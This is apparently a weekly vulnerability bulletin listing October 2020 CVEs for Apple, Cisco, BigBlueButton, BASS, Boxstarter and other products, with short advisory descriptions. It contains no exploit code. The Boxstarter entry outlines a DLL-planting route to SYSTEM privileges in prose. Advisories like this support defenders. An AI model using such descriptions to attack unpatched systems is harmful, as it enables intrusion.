apereo — cas	Apereo CAS 5.3.x before 5.3.16, 6.x before 6.1.7.2, 6.2.x before 6.2.4, and 6.3.x before 6.3.0-RC4 mishandles secret keys with Google Authenticator for multifactor authentication.	2020-10-16	not yet calculated	CVE-2020-27178 MISC
apple — macos_catalina	An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A local user may be able to cause unexpected system termination or read kernel memory.	2020-10-22	not yet calculated	CVE-2020-9779 MISC
apple — macos_catalina	A race condition was addressed with additional validation. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges.	2020-10-22	not yet calculated	CVE-2020-9990 MISC
apple — macos_catalina	This issue was addressed with a new entitlement. This issue is fixed in macOS Catalina 10.15.4. A user may gain access to protected parts of the file system.	2020-10-22	not yet calculated	CVE-2020-9771 MISC
apple — macos_catalina	A file access issue existed with certain home folder files. This was addressed with improved access restrictions. This issue is fixed in macOS Catalina 10.15.7. A malicious application may be able to read sensitive location information.	2020-10-22	not yet calculated	CVE-2020-9986 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. An application may be able to gain elevated privileges.	2020-10-22	not yet calculated	CVE-2020-3898 MISC
apple — macos_catalina	A path handling issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to overwrite arbitrary files.	2020-10-22	not yet calculated	CVE-2020-3915 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. Viewing a maliciously crafted JPEG file may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9887 MISC
apple — macos_catalina	A race condition was addressed with improved state handling. This issue is fixed in macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges.	2020-10-22	not yet calculated	CVE-2020-9796 MISC
apple — macos_catalina	A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.5. A person with physical access to a Mac may be able to bypass Login Window.	2020-10-22	not yet calculated	CVE-2020-9810 MISC
apple — macos_catalina	An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A remote attacker may be able to leak sensitive user information.	2020-10-22	not yet calculated	CVE-2020-9828 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may cause an unexpected application termination.	2020-10-22	not yet calculated	CVE-2020-9869 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.	2020-10-22	not yet calculated	CVE-2020-9899 MISC
apple — macos_catalina	An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, watchOS 6.2.8. A malicious application may disclose restricted memory.	2020-10-22	not yet calculated	CVE-2020-9997 MISC MISC
apple — macos_catalina	This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to load unsigned kernel extensions.	2020-10-22	not yet calculated	CVE-2020-9939 MISC
apple — macos_catalina	A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A user may be unexpectedly logged in to another user’s account.	2020-10-22	not yet calculated	CVE-2020-9935 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory.	2020-10-22	not yet calculated	CVE-2020-9929 MISC
apple — macos_catalina	Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.	2020-10-22	not yet calculated	CVE-2020-9928 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.	2020-10-22	not yet calculated	CVE-2020-9927 MISC
apple — macos_catalina	A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may be able to cause a denial of service.	2020-10-22	not yet calculated	CVE-2020-9924 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with system privileges.	2020-10-22	not yet calculated	CVE-2020-9921 MISC
apple — macos_catalina	An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory.	2020-10-22	not yet calculated	CVE-2020-9908 MISC
apple — macos_catalina	A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to determine kernel memory layout.	2020-10-22	not yet calculated	CVE-2020-9853 MISC
apple — multiple_products	A certificate validation issue existed when processing administrator added certificates. This issue was addressed with improved certificate validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An attacker may have been able to impersonate a trusted website using shared key material for an administrator added certificate.	2020-10-22	not yet calculated	CVE-2020-9868 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9938 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9872 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to determine kernel memory layout.	2020-10-22	not yet calculated	CVE-2020-9902 MISC MISC MISC MISC
apple — multiple_products	Multiple memory corruption issues were addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges.	2020-10-22	not yet calculated	CVE-2020-9892 MISC MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5. An application may be able to gain elevated privileges.	2020-10-22	not yet calculated	CVE-2020-9854 MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. Some websites may not have appeared in Safari Preferences.	2020-10-22	not yet calculated	CVE-2020-9787 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9873 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9883 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9880 MISC MISC MISC MISC
apple — multiple_products	An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A local attacker may be able to elevate their privileges.	2020-10-22	not yet calculated	CVE-2020-9900 MISC MISC MISC MISC
apple — multiple_products	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9881 MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9984 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9937 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9879 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9882 MISC MISC MISC
apple — multiple_products	A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A malicious mail server may overwrite arbitrary mail files.	2020-10-22	not yet calculated	CVE-2020-9920 MISC MISC MISC
apple — multiple_products	A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.	2020-10-22	not yet calculated	CVE-2020-9906 MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9877 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	This issue was addressed with improved entitlements. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A sandboxed process may be able to circumvent sandbox restrictions.	2020-10-22	not yet calculated	CVE-2020-9898 MISC MISC
apple — multiple_products	A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A remote attacker may be able to cause a denial of service.	2020-10-22	not yet calculated	CVE-2020-9905 MISC MISC MISC
apple — multiple_products	A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges.	2020-10-22	not yet calculated	CVE-2020-9904 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9876 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9919 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9874 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A sandboxed process may be able to circumvent sandbox restrictions.	2020-10-22	not yet calculated	CVE-2020-9772 MISC MISC MISC MISC
apple — multiple_products	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9940 MISC MISC MISC
apple — multiple_products	An integer overflow was addressed through improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9875 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An access issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A local user may be able to view sensitive user information.	2020-10-22	not yet calculated	CVE-2020-3918 MISC MISC MISC MISC
apple — multiple_products	An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A local attacker may be able to elevate their privileges.	2020-10-22	not yet calculated	CVE-2020-9901 MISC MISC MISC
apple — multiple_products	A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to overwrite arbitrary files.	2020-10-22	not yet calculated	CVE-2020-9994 MISC MISC MISC MISC
apple — multiple_products	A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9985 MISC MISC MISC
apple — multiple_products	A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges.	2020-10-22	not yet calculated	CVE-2020-9863 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9871 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted font file may lead to arbitrary code execution.	2020-10-22	not yet calculated	CVE-2020-9980 MISC MISC MISC MISC
aptean — product_configurator	An issue was discovered in Aptean Product Configurator 4.61.0000 on Windows. A Time based SQL injection affects the nameTxt parameter on the main login page (aka cse?cmd=LOGIN). This can be exploited directly, and remotely.	2020-10-16	not yet calculated	CVE-2020-26944 MISC MISC
arista — eos	Arista EOS before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause a denial of service (restart of agents) by crafting a malformed DHCP packet which leads to an incorrect route being installed.	2020-10-21	not yet calculated	CVE-2020-17355 CONFIRM
atmel — advanced_software_framework	Atmel Advanced Software Framework (ASF) 4 has an Integer Overflow.	2020-10-22	not yet calculated	CVE-2019-16127 MISC MISC MLIST
atomxcms — atomxcms	AtomXCMS 2.0 is affected by Incorrect Access Control via admin/dump.php	2020-10-22	not yet calculated	CVE-2020-26649 MISC
atomxcms — atomxcms	AtomXCMS 2.0 is affected by Arbitrary File Read via admin/dump.php	2020-10-22	not yet calculated	CVE-2020-26650 MISC
bass — audio_library	The BASSMIDI plugin 2.4.12.1 for Un4seen BASS Audio Library on Windows is prone to an out of bounds write vulnerability. An attacker may exploit this to execute code on the target machine. A failure in exploitation leads to a denial of service.	2020-10-16	not yet calculated	CVE-2019-19513 MISC MISC
bass — audio_library	The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Denial of Service vulnerability (infinite loop) via a crafted .mp3 file. This weakness could allow attackers to consume excessive CPU and the application becomes unresponsive.	2020-10-16	not yet calculated	CVE-2019-18796 MISC MISC
bass — audio_library	The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Use after Free vulnerability via a crafted .ogg file. An attacker can exploit this to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service.	2020-10-16	not yet calculated	CVE-2019-18794 MISC MISC
bass — audio_library	The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile out of bounds read vulnerability via a crafted .wav file. An attacker can exploit this issues to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service.	2020-10-16	not yet calculated	CVE-2019-18795 MISC MISC
belkin — linksys_wrt160nl	UNSUPPORTED WHEN ASSIGNED Belkin LINKSYS WRT160NL 1.0.04.002_US_20130619 devices have a stack-based buffer overflow vulnerability because of sprintf in create_dir in mini_httpd. Successful exploitation leads to arbitrary code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	2020-10-23	not yet calculated	CVE-2020-26561 MISC
bender — multiple_devices	In Bender COMTRAXX, user authorization is validated for most, but not all, routes in the system. A user with knowledge about the routes can read and write configuration data without prior authorization. This affects COM465IP, COM465DP, COM465ID, CP700, CP907, and CP915 devices before 4.2.0.	2020-10-16	not yet calculated	CVE-2019-19885 MISC
bigbluebutton — bigbluebutton	BigBlueButton before 2.2.28 (or earlier) does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session.	2020-10-21	not yet calculated	CVE-2020-27606 MISC
bigbluebutton — bigbluebutton	BigBlueButton before 2.2.27 has an unsafe JODConverter setting in which LibreOffice document conversions can access external files.	2020-10-21	not yet calculated	CVE-2020-27603 MISC
bigbluebutton — bigbluebutton	BigBlueButton through 2.2.28 uses Ghostscript for processing of uploaded EPS documents, and consequently may be subject to attacks related to a “schwache Sandbox.”	2020-10-21	not yet calculated	CVE-2020-27605 MISC
bigbluebutton — bigbluebutton	BigBlueButton before 2.3 does not implement LibreOffice sandboxing. This might make it easier for remote authenticated users to read the API shared secret in the bigbluebutton.properties file. With the API shared secret, an attacker can (for example) use api/join to join an arbitrary meeting regardless of its guestPolicy setting.	2020-10-21	not yet calculated	CVE-2020-27604 MISC MISC
bigbluebutton — bigbluebutton	BigBlueButton before 2.2.7 allows remote authenticated users to read local files and conduct SSRF attacks via an uploaded Office document that has a crafted URL in an ODF xlink field.	2020-10-21	not yet calculated	CVE-2020-25820 MISC MISC MISC MISC MISC
bigbluebutton — bigbluebutton	In BigBlueButton before 2.2.28 (or earlier), the client-side Mute button only signifies that the server should stop accepting audio data from the client. It does not directly configure the client to stop sending audio data to the server, and thus a modified server could store the audio data and/or transmit it to one or more meeting participants or other third parties.	2020-10-21	not yet calculated	CVE-2020-27607 MISC
bigbluebutton — bigbluebutton	In BigBlueButton before 2.2.28 (or earlier), uploaded presentations are sent to clients without a Content-Type header, which allows XSS, as demonstrated by a .png file extension for an HTML document.	2020-10-21	not yet calculated	CVE-2020-27608 MISC
bigbluebutton — bigbluebutton	The installation procedure in BigBlueButton before 2.2.28 (or earlier) exposes certain network services to external interfaces, and does not automatically set up a firewall configuration to block external access.	2020-10-21	not yet calculated	CVE-2020-27610 MISC
bigbluebutton — bigbluebutton	The installation procedure in BigBlueButton before 2.2.28 (or earlier) uses ClueCon as the FreeSWITCH password, which allows local users to achieve unintended FreeSWITCH access.	2020-10-21	not yet calculated	CVE-2020-27613 MISC
bigbluebutton — bigbluebutton	Greenlight in BigBlueButton through 2.2.28 places usernames in room URLs, which may represent an unintended information leak to users in a room, or an information leak to outsiders if any user publishes a screenshot of a browser window.	2020-10-21	not yet calculated	CVE-2020-27612 MISC
bigbluebutton — bigbluebutton	BigBlueButton through 2.2.28 uses STUN/TURN resources from a third party, which may represent an unintended endpoint.	2020-10-21	not yet calculated	CVE-2020-27611 MISC
bigbluebutton — bigbluebutton	BigBlueButton through 2.2.28 records a video meeting despite the deactivation of video recording in the user interface. This may result in data storage beyond what is authorized for a specific meeting topic or participant.	2020-10-21	not yet calculated	CVE-2020-27609 MISC MISC
bigbluebutton — bigbluebutton	A cross-site scripting (XSS) vulnerability exists in the ‘merge account’ functionality in admins.js in BigBlueButton Greenlight 2.7.6.	2020-10-22	not yet calculated	CVE-2020-27642 MISC
biscom — secure_file_transfer	Biscom Secure File Transfer (SFT) before 5.1.1082 and 6.x before 6.0.1011 allows user credential theft.	2020-10-22	not yet calculated	CVE-2020-27646 MISC
blinger.io — blinger.io	Blinger.io v.1.0.2519 is vulnerable to Blind/Persistent XSS. An attacker can send arbitrary JavaScript code via a built-in communication channel, such as Telegram, WhatsApp, Viber, Skype, Facebook, Vkontakte, or Odnoklassniki. This is mishandled within the administration panel for conversations/all, conversations/inbox, conversations/unassigned, and conversations/closed.	2020-10-19	not yet calculated	CVE-2019-13633 MISC MISC
boxstarter — boxstarter	The Boxstarter installer before version 2.13.0 configures C:ProgramDataBoxstarter to be in the system-wide PATH environment variable. However, this directory is writable by normal, unprivileged users. To exploit the vulnerability, place a DLL in this directory that a privileged service is looking for. For example, WptsExtensions.dll When Windows starts, it’ll execute the code in DllMain() with SYSTEM privileges. Any unprivileged user can execute code with SYSTEM privileges. The issue is fixed in version 3.13.0	2020-10-20	not yet calculated	CVE-2020-15264 MISC CONFIRM CERT-VN
cisco — adapative_security_appliance_and_firepwoer_threat_defense_software	A vulnerability in the SSL/TLS session handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory leak when closing SSL/TLS connections in a specific state. An attacker could exploit this vulnerability by establishing several SSL/TLS sessions and ensuring they are closed under certain conditions. A successful exploit could allow the attacker to exhaust memory resources in the affected device, which would prevent it from processing new SSL/TLS connections, resulting in a DoS. Manual intervention is required to recover an affected device.	2020-10-21	not yet calculated	CVE-2020-3572 CISCO
cisco — adaptive_security_appliance_and_cisco_firepower_threat_defense_software	A vulnerability in the FTP inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass FTP inspection. The vulnerability is due to ineffective flow tracking of FTP traffic. An attacker could exploit this vulnerability by sending crafted FTP traffic through an affected device. A successful exploit could allow the attacker to bypass FTP inspection and successfully complete FTP connections.	2020-10-21	not yet calculated	CVE-2020-3564 CISCO
cisco — adaptive_security_appliance_and_cisco_firepower_threat_defense_software	A vulnerability in the Clientless SSL VPN (WebVPN) of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to inject arbitrary HTTP headers in the responses of the affected system. The vulnerability is due to improper input sanitization. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to conduct a CRLF injection attack, adding arbitrary HTTP headers in the responses of the system and redirecting the user to arbitrary websites.	2020-10-21	not yet calculated	CVE-2020-3561 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense)software	A vulnerability in the SIP inspection process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a crash and reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to a watchdog timeout and crash during the cleanup of threads that are associated with a SIP connection that is being deleted from the connection list. An attacker could exploit this vulnerability by sending a high rate of crafted SIP traffic through an affected device. A successful exploit could allow the attacker to cause a watchdog timeout and crash, resulting in a crash and reload of the affected device.	2020-10-21	not yet calculated	CVE-2020-3555 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.	2020-10-21	not yet calculated	CVE-2020-3581 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.	2020-10-21	not yet calculated	CVE-2020-3583 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.	2020-10-21	not yet calculated	CVE-2020-3580 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access rule and access parts of the WebVPN portal that are supposed to be blocked. The vulnerability is due to insufficient validation of URLs when portal access rules are configured. An attacker could exploit this vulnerability by accessing certain URLs on the affected device.	2020-10-21	not yet calculated	CVE-2020-3578 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the TLS handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 1000 Series firewalls could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper implementation of countermeasures against the Bleichenbacher attack for cipher suites that rely on RSA for key exchange. An attacker could exploit this vulnerability by sending crafted TLS messages to the device, which would act as an oracle and allow the attacker to carry out a chosen-ciphertext attack. A successful exploit could allow the attacker to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions to the affected device. To exploit this vulnerability, an attacker must be able to perform both of the following actions: Capture TLS traffic that is in transit between clients and the affected device Actively establish a considerable number of TLS connections to the affected device	2020-10-21	not yet calculated	CVE-2020-3585 CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software	A vulnerability in the TCP packet processing of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory exhaustion condition. An attacker could exploit this vulnerability by sending a high rate of crafted TCP traffic through an affected device. A successful exploit could allow the attacker to exhaust device resources, resulting in a DoS condition for traffic transiting the affected device.	2020-10-21	not yet calculated	CVE-2020-3554 CISCO
